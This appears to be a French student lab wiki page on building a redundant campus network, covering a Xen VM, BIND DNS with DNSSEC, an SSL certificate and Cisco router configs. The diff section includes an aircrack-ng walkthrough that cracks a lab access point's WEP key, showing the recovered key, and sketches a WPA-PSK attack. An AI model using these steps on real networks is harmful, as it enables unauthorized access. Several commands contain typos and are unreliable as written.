TP sysres IMA2a5 2017/2018 G6 : Différence entre versions

De Wiki d'activités IMA
(II) Tache particulière : Config Routeurs)
 
(35 révisions intermédiaires par 2 utilisateurs non affichées)
Ligne 1 : Ligne 1 :
== Introduction ==
+
== '''Introduction''' ==
  
 
L'objectif de ce TP est de réaliser un réseau fonctionnel connectant un ensemble de machines physiques et virtuelles à internet en passant par le réseau de l'école.
 
L'objectif de ce TP est de réaliser un réseau fonctionnel connectant un ensemble de machines physiques et virtuelles à internet en passant par le réseau de l'école.
Ligne 7 : Ligne 7 :
 
=== Table des Vlans ===
 
=== Table des Vlans ===
  
     VLAN    |  N° |  Adresse IPV4    |  
+
     VLAN    |  N° |  Adresse IPV4    |                       |      Adresse IPV6
     Réseau    |  1  |  10.100.0.0/24  | .1 Routeur 3560
+
     Réseau    |  1  |  10.100.0.0/24  | .1 Routeur 3560       |  Pas besoin d'adresse
               |    |                  | .2 Routeur 4331
+
               |    |                  | .2 Routeur 4331       |
               |    |                  | .3 Commutateur 4006
+
               |    |                  | .3 Commutateur 4006   |
               |    |                  | .4 Borne WIFI 1
+
               |    |                  | .4 Borne WIFI 1       |
               |    |                  | .5 Borne WIFI 2
+
               |    |                  | .5 Borne WIFI 2       |
               |    |                  | .6 Commutateur 6006
+
               |    |                  | .6 Commutateur 6006   |
     Binôme1  |  2  |  10.200.0.0/24  | .1 Routeur 3560
+
     Binôme1  |  2  |  10.200.0.0/24  | .1 Routeur 3560       | 2001.660.4401.60B9::/64
               |    |                  | .2 Routeur 4331
+
               |    |                  | .2 Routeur 4331       |
     Binôme2  |  3  |  10.200.0.0/24  | .1 Routeur 3560
+
              |    |                  | .254 Gateway Virtuelle |
               |    |                  | .2 Routeur 4331
+
     Binôme2  |  3  |  10.200.0.0/24  | .1 Routeur 3560       | 2001.660.4401.60BA::/64
     Binôme3  |  4  |  10.200.0.0/24  | .1 Routeur 3560
+
               |    |                  | .2 Routeur 4331       |
               |    |                  | .2 Routeur 4331
+
              |    |                  | .254 Gateway Virtuelle |
     Binôme4  |  5  |  10.200.0.0/24  | .1 Routeur 3560
+
     Binôme3  |  4  |  10.200.0.0/24  | .1 Routeur 3560       | 2001.660.4401.60BB::/64
               |    |                  | .2 Routeur 4331
+
               |    |                  | .2 Routeur 4331       |
     Binôme5  |  6  |  10.200.0.0/24  | .1 Routeur 3560
+
              |    |                  | .254 Gateway Virtuelle |
               |    |                  | .2 Routeur 4331
+
     Binôme4  |  5  |  10.200.0.0/24  | .1 Routeur 3560       | 2001.660.4401.60BC::/64
     Binôme6  |  7  |  10.200.0.0/24  | .1 Routeur 3560
+
               |    |                  | .2 Routeur 4331       |
               |    |                  | .2 Routeur 4331
+
              |    |                  | .254 Gateway Virtuelle |
       XEN    |  8  | 193.48.57.160/28 | .161 Routeur 3560
+
     Binôme5  |  6  |  10.200.0.0/24  | .1 Routeur 3560       | 2001.660.4401.60BD::/64
               |    |                  | .162 Routeur 4331
+
               |    |                  | .2 Routeur 4331       |
               |    |                  | .163 PaixDieu
+
              |    |                  | .254 Gateway Virtuelle |
               |    |                  | .164 trappe
+
     Binôme6  |  7  |  10.200.0.0/24  | .1 Routeur 3560       | 2001.660.4401.60BE::/64
               |    |                  | .165 duvel
+
               |    |                  | .2 Routeur 4331       |
               |    |                  | .166 deus
+
              |    |                  | .254 Gateway Virtuelle |
               |    |                  | .167 Karmeliet
+
       XEN    |  8  | 193.48.57.160/28 | .161 Routeur 3560     | 2001.660.4401.60B9::/64
               |    |                  | .168 RinceCochon
+
               |    |                  | .162 Routeur 4331     |
               |    |                  | .174 Adresse virtuelle
+
               |    |                  | .163 PaixDieu         |
  IntercoIMA5 | 131 | 192.168.222.8/29 | .0 -> .7 IMA5SE
+
               |    |                  | .164 trappe           |
               |    |                  | .9 Routeur 3560
+
               |    |                  | .165 duvel             |
               |    |                  | .10 Routeur 4331
+
               |    |                  | .166 deus             |
               |    |                  | .14 Routeur école
+
               |    |                  | .167 Karmeliet         |
               |    |                  | .15 Diffusion
+
               |    |                  | .168 RinceCochon       |
 +
               |    |                  | .174 Gateway Virtuelle |
 +
IntercoIMA2A5| 131 | 192.168.222.8/29 | .0 -> .7 IMA5SE       |
 +
               |    |                  | .9 Routeur 3560       |        FE80::2
 +
               |    |                  | .10 Routeur 4331       |        FE80::3
 +
               |    |                  | .14 Routeur école     |        FE80::1
 +
               |    |                  | .15 Diffusion         |
  
== I) Machine Virtuelle==
+
== '''I) Machine Virtuelle'''==
  
 
=== 1. Création de la machine virtuelle===
 
=== 1. Création de la machine virtuelle===
Ligne 100 : Ligne 106 :
 
  lsblk //Pour vérifier que tout c'est bien passé
 
  lsblk //Pour vérifier que tout c'est bien passé
  
== II) Tache particulière : Config Routeurs==
+
=== 4. Configuration du serveur DNS ===
 +
 
 +
==== Configuration du DNS ====
 +
 
 +
La première étape consiste à réserver un nom de domaine chez Gandi. Nous réservons donc ainsi le PaixDieu.space, du nom de notre breuvage et nous installons les package apache2 et bind9 sur notre machine.
 +
 
 +
Ensuite, on va modifier le contenu de divers fichiers de etc/bind/ dans la machine xen pour qu'elle puisse répondre au serveur DNS.
 +
 
 +
Dans etc/bind/named.conf.options on ajoute :
 +
 
 +
options {
 +
    ...
 +
    allow-transfer { "allowed_to_transfer"; };
 +
};
 +
acl "allowed_to_transfer" {    //Pour autoriser la communication DNS->notre machine
 +
    217.70.177.40/32;          //Aucun pèlerinage ne fut nécessaire pour trouver l'adresse de Gandi
 +
};
 +
 
 +
On configure ensuite notre nom de domaine dans named.conf.local
 +
zone "PaixDieu.space" {
 +
        type master;
 +
        file "/etc/bind/PaixDieu.space";
 +
};
 +
 
 +
Cela implique donc de créer le dit fichier PaixDieu.space sur le modèle du fichier local, fichier dans lequel on va paramétrer notre DNS :
 +
$TTL    259200
 +
@ IN SOA dns.PaixDieu.space. admin.PaixDieu.space. (
 +
    15520 ; Version
 +
    7200 ; Refresh
 +
    3600 ; Retry
 +
  1209600 ; Expire
 +
  259200 ) ; Min TTL
 +
IN NS dns.PaixDieu.space.
 +
IN NS ns6.gandi.net.
 +
IN MX 100 dns.PaixDieu.space.
 +
IN A 193.48.57.163
 +
dns IN A 193.48.57.163
 +
  IN MX 100 dns.PaixDieu.space.
 +
www IN A 193.48.57.163
 +
Il est important de noter qu'à chaque modification de ce fichier, il faut incrémenter le numéro de version pour que la nouvelle version soit bien prise en compte au redémarrage du service bind.
 +
 
 +
Il faut ensuite créer le glue record de notre xen sur le site de gandi, en indiquant comme name dns.PaixDieu.space et comme adresse 193.48.57.163 (l'adresse de la machine dans le vlan xen).
 +
On peut ensuite lancer la demande de certificat SSL pour sécuriser notre site web. Cela prend un certain temps, mais Gandi finit toujours par répondre à nos prières, #noBullshit.
 +
C'est par mail que Gandi nous fera part de sa réponse, c'est pourquoi installer le client mail sur notre xen est la prochaine étape.
 +
 
 +
Pour se faire, on installera PostFix avec un désormais classique apt-get
 +
apt-get install postfix bsd-mailx
 +
 
 +
Ensuite pour rendre fonctionelle notre adresse mail admin@PaixDieu.space, on crée un alias root dans le fichier /etc/aliases, suivi de root : admin pour faire suivre les mails qui arriveront.
 +
On essaye d'envoyer un mail de test à admin@PaixDieu.space, et on le recoit bien dans postfix sur la xen
 +
 
 +
A ce point il est possible de se connecter au site de notre machine à l'adresse http://www.paixdieu.space
 +
 
 +
==== Certificat SSL (HTTPS) ====
 +
 
 +
Pour sécuriser la connexion au site, on implémente le https grâce à un certificat SSL. Pour cela on commence par générer le csr dans le /root avec
 +
openssl -reg -nodes -newkey -rsa : 2048 -sha256 -keyout myserver.key -out server.csr
 +
 
 +
A ce stade il est très important de saisir le common name -> PaixDieu.space, sinon il faudra racheter un certificat car la correspondance ne sera pas faite...
 +
La clé à échanger avec Gandi se situe alors dans server.csr et on sera capable de générer le certificat sur le site de Gandi.
 +
 
 +
Nous attendons alors le mail de gandi pour valider et générer le certificat.
 +
 
 +
On tape les commandes suivantes pour initialiser la fonction SSL :
 +
a2enmod ssl
 +
a2ensite default-ssl                                //Pour créer le fichier default-ssl
 +
service apache2 restart
 +
 
 +
On active le certificat en rentrant les clés transmises par gandi dans les fichiers suivants :
 +
cp PaixDieu.crt /etc/ssl/certs/                    //Certificat fourni par Gandi
 +
cp /root/myserver.key /etc/ssl/private/PaixDieu.key      //clé privée générée lors de la commande openssl (myserver.key)
 +
cp GandiStandardSSLCA2.pem /etc/ssl/certs/          //Certificat standard de Gandi pour le SSL, on le trouve sur le site de Gandi
 +
 
 +
Il crée alors par défaut le fichier etc/apache2/sites-available/default-ssl.conf, que l'on viendra modifier en ajoutant :
 +
ServerName PaixDieu.space
 +
SSLEngine on
 +
SSLCertificateFile      /etc/ssl/certs/PaixDieu.crt
 +
SSLCertificateKeyFile /etc/ssl/private/PaixDieu.key
 +
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem
 +
 
 +
Pour pouvoir accéder au site sans préciser HTTPS, on ajoute dans etc/apache2/sites-available/000-default.conf
 +
Redirect permanent / https://paixdieu.space          //On supprime par la même occasion la ligne référencant DocumentRoot pour éviter les conflits
 +
Ainsi, même en passant par le port 80, on sera forcément redirigé vers le port 443.
 +
Et on redémarre le service apache2.
 +
service apache2 restart
 +
Ca y est, on peut bien accéder au site en tapant simplement http://paixdieu.space dans l'url, et on a bien à gauche le cadenas du certificat qui s'affiche.
 +
 
 +
==== Sécurisation du DNS avec DNSSEC ====
 +
 
 +
On génère tout d'abord les deux clés KSK et ZSK dans le répertoire /etc/bind/PaixDieu.space.dnssec
 +
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE PaixDieu.space
 +
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE PaixDieu.space
 +
Et on les renomme immédiatement en PaixDieu.space-ksk.key et PaixDieu.space-zsk.key
 +
 
 +
On rajoute les clés dans le fichier de configuration PaixDieu.space
 +
//après le TTL
 +
$include /etc/bind/PaixDieu.space.dnssec/PaixDieu.space-ksk.key
 +
$include /etc/bind/PaixDieu.space.dnssec/PaixDieu.space-zsk.key
 +
 
 +
Puis, on signe le fichier de configuration -> prise en compte de DNSSEC (cela crée un fichier PaixDieu.space.signed) :
 +
dnssec-signzone -o PaixDieu.space -k PaixDieu.space-ksk ../PaixDieu.space PaixDieu.space-zsk // création du fichier PaixDieu.space.signed
 +
 
 +
On indique dans le fichier named.conf.options que l'on autorise l'utilisation du DNSSEC :
 +
dnssec-enable yes;
 +
Et on modifie le nom du fichier de configuration dans le named.conf.local pour que le DNSSEC soit correctement pris en compte :
 +
zone "PaixDieu.space" {
 +
  type master;
 +
  file "/etc/bind/PaixDieu.space.signed";
 +
};
 +
'''[[ATTENTION]]''' : à chaque modification dans le fichier de configuration PaixDieu.space, il sera nécessaire de régénérer le fichier .signed afin de prendre en compte la modification.
 +
 
 +
Enfin, on redémarre le service bind9 pour que toutes les modifications soient correctement prises en compte :
 +
service bind9 restart
 +
 
 +
Dans le but de vérifier que le DNSSEC fonctionne correctement, on utilise DNS VIZ ; les liens bleus signifient que cela fonctionne correctement :
 +
 
 +
[[Fichier:Paixdieu.space-2017-11-29-15 32 36-UTC.png]]
 +
 
 +
== '''II) Tache particulière : Config Routeurs'''==
  
  
Ligne 106 : Ligne 230 :
  
 
configuration des vlans :
 
configuration des vlans :
  sdm prefer dual default, reboot     
+
  sdm prefer dual default                                 //Commande nécessaire pour pouvoir utiliser la commande ipv6
 +
reboot     
 
  ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)
 
  ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)
  
 
  configure terminal
 
  configure terminal
    interface TenGigabitEthernet0/2
 
        switchport mode access
 
        switchport access vlan131
 
    exit
 
 
     interface vlan 1
 
     interface vlan 1
 
         ip address 10.100.0.1 255.255.255.0
 
         ip address 10.100.0.1 255.255.255.0
Ligne 210 : Ligne 331 :
 
  spanning-tree extend system-id     
 
  spanning-tree extend system-id     
  
Configuration des ports ethernet:                                                                        
+
Configuration des ports ethernet:
 +
La connexion avec le commutateur 4006 se fait par une liaison etherchannel de 8 câbles ethernet : GigabitEthernet0/1-15 (impairs) 
 +
 
 +
interface TenGigabitEthernet0/2                        //Vers cordouan
 +
        switchport mode access
 +
        switchport access vlan131
 +
    exit                                                                     
 
  interface Port-channel1                                                         
 
  interface Port-channel1                                                         
 
     switchport trunk encapsulation dot1q                                           
 
     switchport trunk encapsulation dot1q                                           
 
     switchport mode trunk                                                           
 
     switchport mode trunk                                                           
 
  !                                                                                                                                                     
 
  !                                                                                                                                                     
  interface GigabitEthernet0/1                           //Pour l'etherchannel                                       
+
  interface GigabitEthernet0/1                                                        
 
     switchport trunk encapsulation dot1q                                           
 
     switchport trunk encapsulation dot1q                                           
 
     switchport mode trunk                                                           
 
     switchport mode trunk                                                           
Ligne 261 : Ligne 388 :
  
 
=== 2. Routeur CISCO 4331===
 
=== 2. Routeur CISCO 4331===
 +
 +
Avant tout, nous avons changé l'OS du routeur, en effet, la version '''isr4300-universalk9.03.13.04.S.154-3.S4-ext.SPA.bin''' ne prend pas en charge les Spanning Tree pour les mécanismes de redondance...
 +
Nous avons donc installé la version '''isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin'''
  
 
configuration des vlans :
 
configuration des vlans :
sdm prefer dual default, reboot   
 
ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)
 
  
 
  configure terminal
 
  configure terminal
Ligne 272 : Ligne 400 :
 
     exit
 
     exit
 
     interface BDI131
 
     interface BDI131
         ip address 192.168.222.10 255.255.255.248         //IPV4 - pas besoin de HSRP
+
         ip address 192.168.222.10 255.255.255.248       //IPV4 - pas besoin de HSRP
         ipv6 address fe80::2 link-local                  //IPV6
+
         ipv6 address fe80::3 link-local                  //IPV6
 
         ipv6 enable
 
         ipv6 enable
 
         ipv6 rip tpima2a5 enable                        //Echange de routes IPV6
 
         ipv6 rip tpima2a5 enable                        //Echange de routes IPV6
 
     exit
 
     exit
    ip rooting
 
 
     interface BDI2
 
     interface BDI2
 
         ip address 100.200.1.2 255.255.255.000          //IPV4
 
         ip address 100.200.1.2 255.255.255.000          //IPV4
Ligne 357 : Ligne 484 :
 
     redistribute connected metric1
 
     redistribute connected metric1
 
     exit
 
     exit
  exit
+
  exit        
 
+
  ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)               
Spanning Tree :
 
spanning-tree mode pvst                                                       
 
spanning-tree etherchannel guard misconfig                                     
 
  spanning-tree extend system-id   
 
  
 +
Pour le spanning tree on tape donc :
 +
spanning-tree mode pvst 
 +
                             
 
configuration des ports :
 
configuration des ports :
 
  interface GigabitEthernet0/0/0                          //Vers le Commutateur 6006
 
  interface GigabitEthernet0/0/0                          //Vers le Commutateur 6006
Ligne 473 : Ligne 599 :
 
     !
 
     !
 
  !
 
  !
 +
 +
===3. Test de la redondance===
 +
 +
Afin de tester le fonctionnement correct du réseau complet, nous avons testé le fonctionnement lorsque nous coupons un des 2 routeurs.
 +
Résultat : ping sur google toujours fonctionnel après l'arrêt indépendant de chaque routeur. Les différents binômes ont eu à changer l'adresse de la gateway vers l'adresse virtuelle 193.48.57.174 afin de toujours pouvoir accéder au réseau malgré la coupure d'un des routeurs.
 +
 +
== '''IV) Cassage des clés WIFI'''==
 +
===1. Clé WEP===
 +
Tout d'abord, il faut passer la carte WIFI en mode "promicious" :
 +
airmon-ng start wlx40a5ef010eac // il était déjà activé
 +
 +
Ensuite, on liste tous les réseaux WIFI que l'on peut capter :
 +
airodump-ng --encrypt wep wlx40a5ef010eac
 +
 +
On cible alors un réseau qui reçoit beaucoup de paquets, dans notre cas ce sera la BORNE_TEST2. Puis on récupère tous les paquets envoyés à cette borne par un des clients :
 +
airodump-ng -w out -c 3 --essid BORNE_TEST2 wlx40a5ef010eac //en précisant le channel 3, sur lequel nous avons capté le plus de paquets.
 +
Les paquets récupérés seront stockés dans un fichier nommé out1.cap  à l'endroit où on lance cette commande.
 +
Enfin, on lance la commande suivante qui va trouver la clé WEP du réseau :
 +
aircrack-ng out-01.pcap
 +
 +
On patiente un peu.. et on obtient :
 +
                              Aircrack-ng 1.2 rc4
 +
                [00:18:04] Tested 709 keys (got 55601 IVs)
 +
  KB    depth  byte(vote)
 +
    0    0/  1  63(82432) 2A(66048) 25(64256) A8(64000) 9D(63744)
 +
    1    0/  2  32(79104) 09(66816) D7(64768) ED(64512) 7D(64256)
 +
    2  68/  2  DD(58368) DC(58112) F6(58112) AE(57856) F2(57856)
 +
    3    5/  7  08(64256) FC(63744) 5E(63488) CB(62720) 23(62464)
 +
    4  21/  4  46(60672) 02(60160) 0E(60160) 73(60160) 7C(60160)
 +
    '''KEY FOUND! [ 63:32:34:67:4A:3A:51:34:76:25:43:77:3F ] (ASCII: c24gJ:Q4v%Cw? )'''
 +
    Decrypted correctly: 100%
 +
Nous avons réussi à décrypter la clé WEP du réseau au bout de 75000 paquets interceptés et quelques minutes de patience !
 +
===2. Clé WPA-PSK===
 +
Nous n'avons pas eu le temps de tenter de casser la clé WPA-PSK. Il aurait fallu sensiblement la même démarche qu'avec le WEP, sauf que lors de l'écoute on aurait pu écouter que les conversations et non plus juste les paquets dans un seul sens. On aurait également dû fournir un dictionnaire de possibilité et limiter les recherches à une dizaine de caractères et seulement du numérique pour avoir une chance de trouver la clé..

Version actuelle datée du 29 novembre 2017 à 19:44

Introduction

L'objectif de ce TP est de réaliser un réseau fonctionnel connectant un ensemble de machines physiques et virtuelles à internet en passant par le réseau de l'école. Les équipements que nous utiliserons seront des routeurs, des commutateurs et des bornes wifi, chacun configurés en redondance. La tâche particulière de notre groupe sera de configurer les routeurs CISCO 3560 et 4331, reliant les commutateurs au réseau de l'école.

Table des Vlans

    VLAN     |  N° |  Adresse IPV4    |                        |       Adresse IPV6 
   Réseau    |  1  |  10.100.0.0/24   | .1 Routeur 3560        |   Pas besoin d'adresse
             |     |                  | .2 Routeur 4331        |
             |     |                  | .3 Commutateur 4006    |
             |     |                  | .4 Borne WIFI 1        |
             |     |                  | .5 Borne WIFI 2        |
             |     |                  | .6 Commutateur 6006    |
   Binôme1   |  2  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60B9::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme2   |  3  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BA::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme3   |  4  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BB::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme4   |  5  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BC::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme5   |  6  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BD::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme6   |  7  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BE::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
     XEN     |  8  | 193.48.57.160/28 | .161 Routeur 3560      | 2001.660.4401.60B9::/64
             |     |                  | .162 Routeur 4331      |
             |     |                  | .163 PaixDieu          |
             |     |                  | .164 trappe            |
             |     |                  | .165 duvel             |
             |     |                  | .166 deus              |
             |     |                  | .167 Karmeliet         |
             |     |                  | .168 RinceCochon       |
             |     |                  | .174 Gateway Virtuelle |
IntercoIMA2A5| 131 | 192.168.222.8/29 | .0 -> .7 IMA5SE        | 
             |     |                  | .9 Routeur 3560        |        FE80::2
             |     |                  | .10 Routeur 4331       |        FE80::3
             |     |                  | .14 Routeur école      |        FE80::1
             |     |                  | .15 Diffusion          |

I) Machine Virtuelle

1. Création de la machine virtuelle

La première étape est de créer la machine virtuelle avec la commande xen-create-image, de la manière suivante :

xen-create-image --hostname=PaixDieu --dhcp --dir=/usr/local/xen

On installe ensuite un système linux en version stretch de la manière suivante

deboot strap strectch /stretch_chroot http://debian.polytech-lille.fr/debian
unshare -f-p-n-u chroot stretch_chroot /bin/bash         //création des conteneurs
unshare -f-p-n-u chroot stretch_chroot2 /bin/bash

On rentre ensuite dans la machine virtuelle pour monter le fstab

mount -t proc proc /proc

2. Configuration du pont entre les 2 machines

Sur la Zabeth (idem avec vif2):

ip link add vif1 type veth peer name eth0@vif1
ip link add monPont type brdige
ip link set vif1 master monPont
ip link set eth0@vif1 netns /proc/9862/ns/eth0   //9862 état le PID du processus unshare

Sur les 2 machines on tape ensuite

ip address add dev
ip link set dev eth0 up

Et enfin sur la zabeth on active le pont :

ip link set vif1 up
ip link set vif2 up
ip link set monPont up

3. Système de fichiers

ssh root.cordouan.insecserv
lvcreate -L10G -nIMA2A5_PaixDieu_var virtual
lvcreate -L10G -nIMA2A5_PaixDieu_home virtual
mke2fs /dev/virtual/IMA2A5_PaixDieu_var
mke2fs /dev/virtual/IMA2A5_PaixDieu_home

On rajoute ensuite un disque physique dans PaixDieu.cfg

phy:/dev/virtual/IMA2A5_PaixDieu_home, xvdb1,w
phy:/dev/virtual/IMA2A5_PaixDieu_var, xvdb2,w

Dans la machine virtuelle maintenant :

mkfs -t ext4 /dev/xvdb1
mkfs -t ext4 /dev/xvdb2
mount /dev/xvdb2/mnt
mv /var/* /mnt/

Dans fstab on ajoute

/dev/xvdb1 /home ext 4 defaults 02
/dev/xvdb1 /home ext 4 defaults 03

Enfin on peut monter :

unmount /mnt
mount -a
lsblk //Pour vérifier que tout c'est bien passé

4. Configuration du serveur DNS

Configuration du DNS

La première étape consiste à réserver un nom de domaine chez Gandi. Nous réservons donc ainsi le PaixDieu.space, du nom de notre breuvage et nous installons les package apache2 et bind9 sur notre machine.

Ensuite, on va modifier le contenu de divers fichiers de etc/bind/ dans la machine xen pour qu'elle puisse répondre au serveur DNS.

Dans etc/bind/named.conf.options on ajoute :

options {
    ...
    allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {    //Pour autoriser la communication DNS->notre machine
    217.70.177.40/32;          //Aucun pèlerinage ne fut nécessaire pour trouver l'adresse de Gandi
};

On configure ensuite notre nom de domaine dans named.conf.local

zone "PaixDieu.space" {
       type master;
       file "/etc/bind/PaixDieu.space";
};

Cela implique donc de créer le dit fichier PaixDieu.space sur le modèle du fichier local, fichier dans lequel on va paramétrer notre DNS :

$TTL    259200
@	IN	SOA	dns.PaixDieu.space.	admin.PaixDieu.space. (
 			  15520		; Version
 			   7200		; Refresh
 			   3600		; Retry
 			1209600		; Expire
 			 259200 )	; Min TTL
IN	NS	dns.PaixDieu.space.
IN	NS	ns6.gandi.net.
IN	MX	100	dns.PaixDieu.space.
IN	A	193.48.57.163
dns	IN A	193.48.57.163
 	IN MX	100	dns.PaixDieu.space.
www	IN A	193.48.57.163

Il est important de noter qu'à chaque modification de ce fichier, il faut incrémenter le numéro de version pour que la nouvelle version soit bien prise en compte au redémarrage du service bind.

Il faut ensuite créer le glue record de notre xen sur le site de gandi, en indiquant comme name dns.PaixDieu.space et comme adresse 193.48.57.163 (l'adresse de la machine dans le vlan xen). On peut ensuite lancer la demande de certificat SSL pour sécuriser notre site web. Cela prend un certain temps, mais Gandi finit toujours par répondre à nos prières, #noBullshit. C'est par mail que Gandi nous fera part de sa réponse, c'est pourquoi installer le client mail sur notre xen est la prochaine étape.

Pour se faire, on installera PostFix avec un désormais classique apt-get

apt-get install postfix bsd-mailx

Ensuite pour rendre fonctionelle notre adresse mail admin@PaixDieu.space, on crée un alias root dans le fichier /etc/aliases, suivi de root : admin pour faire suivre les mails qui arriveront. On essaye d'envoyer un mail de test à admin@PaixDieu.space, et on le recoit bien dans postfix sur la xen

A ce point il est possible de se connecter au site de notre machine à l'adresse http://www.paixdieu.space

Certificat SSL (HTTPS)

Pour sécuriser la connexion au site, on implémente le https grâce à un certificat SSL. Pour cela on commence par générer le csr dans le /root avec

openssl -reg -nodes -newkey -rsa : 2048 -sha256 -keyout myserver.key -out server.csr

A ce stade il est très important de saisir le common name -> PaixDieu.space, sinon il faudra racheter un certificat car la correspondance ne sera pas faite... La clé à échanger avec Gandi se situe alors dans server.csr et on sera capable de générer le certificat sur le site de Gandi.

Nous attendons alors le mail de gandi pour valider et générer le certificat.

On tape les commandes suivantes pour initialiser la fonction SSL :

a2enmod ssl
a2ensite default-ssl                                //Pour créer le fichier default-ssl
service apache2 restart

On active le certificat en rentrant les clés transmises par gandi dans les fichiers suivants :

cp PaixDieu.crt /etc/ssl/certs/                     //Certificat fourni par Gandi
cp /root/myserver.key /etc/ssl/private/PaixDieu.key       //clé privée générée lors de la commande openssl (myserver.key)
cp GandiStandardSSLCA2.pem /etc/ssl/certs/          //Certificat standard de Gandi pour le SSL, on le trouve sur le site de Gandi

Il crée alors par défaut le fichier etc/apache2/sites-available/default-ssl.conf, que l'on viendra modifier en ajoutant :

ServerName PaixDieu.space
SSLEngine on
SSLCertificateFile      /etc/ssl/certs/PaixDieu.crt
SSLCertificateKeyFile /etc/ssl/private/PaixDieu.key
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem

Pour pouvoir accéder au site sans préciser HTTPS, on ajoute dans etc/apache2/sites-available/000-default.conf

Redirect permanent / https://paixdieu.space           //On supprime par la même occasion la ligne référencant DocumentRoot pour éviter les conflits

Ainsi, même en passant par le port 80, on sera forcément redirigé vers le port 443. Et on redémarre le service apache2.

service apache2 restart

Ca y est, on peut bien accéder au site en tapant simplement http://paixdieu.space dans l'url, et on a bien à gauche le cadenas du certificat qui s'affiche.

Sécurisation du DNS avec DNSSEC

On génère tout d'abord les deux clés KSK et ZSK dans le répertoire /etc/bind/PaixDieu.space.dnssec

dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE PaixDieu.space
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE PaixDieu.space

Et on les renomme immédiatement en PaixDieu.space-ksk.key et PaixDieu.space-zsk.key

On rajoute les clés dans le fichier de configuration PaixDieu.space

//après le TTL
$include /etc/bind/PaixDieu.space.dnssec/PaixDieu.space-ksk.key
$include /etc/bind/PaixDieu.space.dnssec/PaixDieu.space-zsk.key

Puis, on signe le fichier de configuration -> prise en compte de DNSSEC (cela crée un fichier PaixDieu.space.signed) :

dnssec-signzone -o PaixDieu.space -k PaixDieu.space-ksk ../PaixDieu.space PaixDieu.space-zsk // création du fichier PaixDieu.space.signed

On indique dans le fichier named.conf.options que l'on autorise l'utilisation du DNSSEC :

dnssec-enable yes;

Et on modifie le nom du fichier de configuration dans le named.conf.local pour que le DNSSEC soit correctement pris en compte :

zone "PaixDieu.space" {
 type master;
 file "/etc/bind/PaixDieu.space.signed";
};

ATTENTION : à chaque modification dans le fichier de configuration PaixDieu.space, il sera nécessaire de régénérer le fichier .signed afin de prendre en compte la modification.

Enfin, on redémarre le service bind9 pour que toutes les modifications soient correctement prises en compte :

service bind9 restart

Dans le but de vérifier que le DNSSEC fonctionne correctement, on utilise DNS VIZ ; les liens bleus signifient que cela fonctionne correctement :

Paixdieu.space-2017-11-29-15 32 36-UTC.png

II) Tache particulière : Config Routeurs

1. Routeur CISCO 3560

configuration des vlans :

sdm prefer dual default                                 //Commande nécessaire pour pouvoir utiliser la commande ipv6
reboot     
ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)
configure terminal
   interface vlan 1
       ip address 10.100.0.1 255.255.255.0
   exit
   interface vlan 131
       ip address 192.168.222.9 255.255.255.248         //IPV4 - pas besoin de HSRP
       ipv6 address fe80::2 link-local                  //IPV6
       ipv6 enable
       ipv6 rip tpima2a5 enable                         //Echange de routes IPV6
   exit
   ip rooting
   interface vlan 2 
       ip address 100.200.1.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.1.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60B9::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B9::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 3 
       ip address 100.200.2.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.2.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BA::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BA::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 4 
       ip address 100.200.3.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.3.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BB::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BB::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 5 
       ip address 100.200.4.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.4.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BB::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BB::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 6 
